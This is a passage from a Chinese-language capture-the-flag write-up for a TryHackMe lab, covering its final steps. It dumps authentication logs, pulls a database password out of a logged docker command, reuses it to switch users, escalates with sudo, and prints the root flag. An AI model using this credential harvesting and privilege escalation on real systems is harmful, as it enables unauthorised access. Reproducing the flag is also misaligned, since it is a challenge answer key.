Dec 13 16:18:29 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/bin/systemctl status ssh
Dec 13 16:18:29 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:18:57 silver-platter sshd[6879]: Accepted password for tyler from 192.168.1.20 port 47772 ssh2
Dec 13 16:18:57 silver-platter sshd[6879]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 16:18:57 silver-platter systemd-logind[700]: New session 5 of user tyler.
Dec 13 16:32:41 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 13 16:32:41 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:32:54 silver-platter passwd[7174]: pam_unix(passwd:chauthtok): password changed for tim
Dec 13 16:33:03 silver-platter sshd[6977]: Received disconnect from 192.168.1.20 port 47772:11: disconnected by user
Dec 13 16:33:03 silver-platter sshd[6977]: Disconnected from user tyler 192.168.1.20 port 47772
Dec 13 16:33:03 silver-platter sshd[6879]: pam_unix(sshd:session): session closed for user tyler
Dec 13 16:33:12 silver-platter sshd[7181]: Accepted password for tim from 192.168.1.20 port 50970 ssh2
Dec 13 16:33:12 silver-platter sshd[7181]: pam_unix(sshd:session): session opened for user tim(uid=1001) by (uid=0)
Dec 13 16:33:40 silver-platter sshd[7245]: Received disconnect from 192.168.1.20 port 50970:11: disconnected by user
Dec 13 16:33:40 silver-platter sshd[7245]: Disconnected from user tim 192.168.1.20 port 50970
Dec 13 16:33:40 silver-platter sshd[7181]: pam_unix(sshd:session): session closed for user tim
Dec 13 16:35:45 silver-platter sshd[7297]: Accepted password for tyler from 192.168.1.20 port 58172 ssh2
Dec 13 16:35:45 silver-platter sshd[7297]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 16:35:45 silver-platter systemd-logind[700]: New session 8 of user tyler.
Dec 13 16:36:35 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/sudo chsh -s /bin/bash tim
Dec 13 16:36:35 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:36:35 silver-platter sudo:     root : TTY=pts/1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/chsh -s /bin/bash tim
Dec 13 16:36:35 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=0)
Dec 13 16:37:24 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/var/log/nginx ; USER=root ; COMMAND=/usr/bin/docker ps
Dec 13 16:37:24 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:37:38 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/var/log/nginx ; USER=root ; COMMAND=/usr/bin/docker exec -it /bin/bash silverpeas
Dec 13 16:37:38 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:37:48 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/var/log/nginx ; USER=root ; COMMAND=/usr/bin/docker exec -it silverpeas /bin/bash
Dec 13 16:37:48 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:40:44 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home ; USER=root ; COMMAND=/usr/bin/mkdir tim
Dec 13 16:40:44 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:40:51 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home ; USER=root ; COMMAND=/usr/bin/chmod 777 tim
Dec 13 16:40:51 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:41:08 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home ; USER=root ; COMMAND=/usr/bin/chmod 555 tim
Dec 13 16:41:08 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:41:30 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home/tim ; USER=root ; COMMAND=/usr/bin/nano user.txt
Dec 13 16:41:30 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:45:33 silver-platter sshd[7622]: Accepted password for tyler from 192.168.1.20 port 33484 ssh2
Dec 13 16:45:33 silver-platter sshd[7622]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 16:45:33 silver-platter systemd-logind[700]: New session 9 of user tyler.
Dec 13 16:45:42 silver-platter sudo:    tyler : TTY=pts/1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/su
Dec 13 16:45:42 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 16:45:42 silver-platter su: pam_unix(su:session): session opened for user root(uid=0) by tyler(uid=0)
Dec 13 17:43:09 silver-platter sshd[7750]: Accepted password for tyler from 192.168.1.20 port 45796 ssh2
Dec 13 17:43:09 silver-platter sshd[7750]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 17:43:09 silver-platter systemd-logind[700]: New session 10 of user tyler.
Dec 13 17:43:14 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker ps
Dec 13 17:43:14 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:43:18 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker stop silverpeas
Dec 13 17:43:18 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:43:34 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker stop postgresql
Dec 13 17:43:34 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:43:39 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker start postgresql
Dec 13 17:43:39 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:43:45 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker start silverpeas
Dec 13 17:43:45 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:43:47 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker ps
Dec 13 17:43:47 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:44:33 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/systemctl enable docker
Dec 13 17:44:33 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:44:46 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker stop silverpeas
Dec 13 17:44:46 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:45:01 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/docker stop postgresql
Dec 13 17:45:01 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:45:48 silver-platter sudo:    tyler : TTY=pts/3 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/su
Dec 13 17:45:48 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:45:48 silver-platter su: pam_unix(su:session): session opened for user root(uid=0) by tyler(uid=0)
Dec 13 17:46:10 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=0)
Dec 13 17:46:12 silver-platter sshd[765]: Server listening on 0.0.0.0 port 22.
Dec 13 17:46:12 silver-platter sshd[765]: Server listening on :: port 22.
Dec 13 17:51:30 silver-platter sshd[1370]: Accepted password for tyler from 192.168.1.20 port 60860 ssh2
Dec 13 17:51:30 silver-platter sshd[1370]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 17:51:30 silver-platter systemd-logind[708]: New session 2 of user tyler.
Dec 13 17:51:30 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 17:51:33 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/su
Dec 13 17:51:33 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:51:33 silver-platter su: pam_unix(su:session): session opened for user root(uid=0) by tyler(uid=0)
Dec 13 17:51:31 silver-platter sshd[729]: Server listening on 0.0.0.0 port 22.
Dec 13 17:51:31 silver-platter sshd[729]: Server listening on :: port 22.
Dec 13 17:51:41 silver-platter sshd[1681]: Accepted password for tyler from 192.168.1.20 port 55392 ssh2
Dec 13 17:51:41 silver-platter sshd[1681]: pam_unix(sshd:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 17:51:41 silver-platter systemd-logind[706]: New session 2 of user tyler.
Dec 13 17:51:41 silver-platter systemd: pam_unix(systemd-user:session): session opened for user tyler(uid=1000) by (uid=0)
Dec 13 17:51:44 silver-platter sudo:    tyler : TTY=pts/0 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/su
Dec 13 17:51:44 silver-platter sudo: pam_unix(sudo:session): session opened for user root(uid=0) by tyler(uid=1000)
Dec 13 17:51:44 silver-platter su: pam_unix(su:session): session opened for user root(uid=0) by tyler(uid=0)
1
Dec 13 15:40:33 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_Zd_zx7N823/ -v postgresql-data:/var/lib/postgresql/data postgres:12.3

找到了password

What is the root flag?

1
2
3
4
tim@silver-platter:/var/log$ su tyler
Password:
tyler@silver-platter:/var/log$ whoami
tyler

然后就是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
tyler@silver-platter:~$ id
uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
tyler@silver-platter:~$ sudo -l
Matching Defaults entries for tyler on silver-platter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User tyler may run the following commands on silver-platter:
    (ALL : ALL) ALL
tyler@silver-platter:~$ cd /home
tyler@silver-platter:/home$ ls
tim  tyler
tyler@silver-platter:/home$ ls /
bin   dev  home  lib32  libx32      media  opt   root  sbin  srv  tmp  var
boot  etc  lib   lib64  lost+found  mnt    proc  run   snap  sys  usr
tyler@silver-platter:/home$ cd /root
bash: cd: /root: Permission denied
tyler@silver-platter:/home$ sudo su
root@silver-platter:/home# cd /root
root@silver-platter:~# ls
root.txt  snap  start_docker_containers.sh
root@silver-platter:~# cat root.txt
THM{098f6bcd4621d373cade4e832627b4f6}
渗透
#cve #提权
THM-Silver Platter
https://0ran9ewww.github.io/2025/01/22/渗透/Silver Platter/
作者
orange
发布于
2025年1月22日
更新于
2025年1月22日
许可协议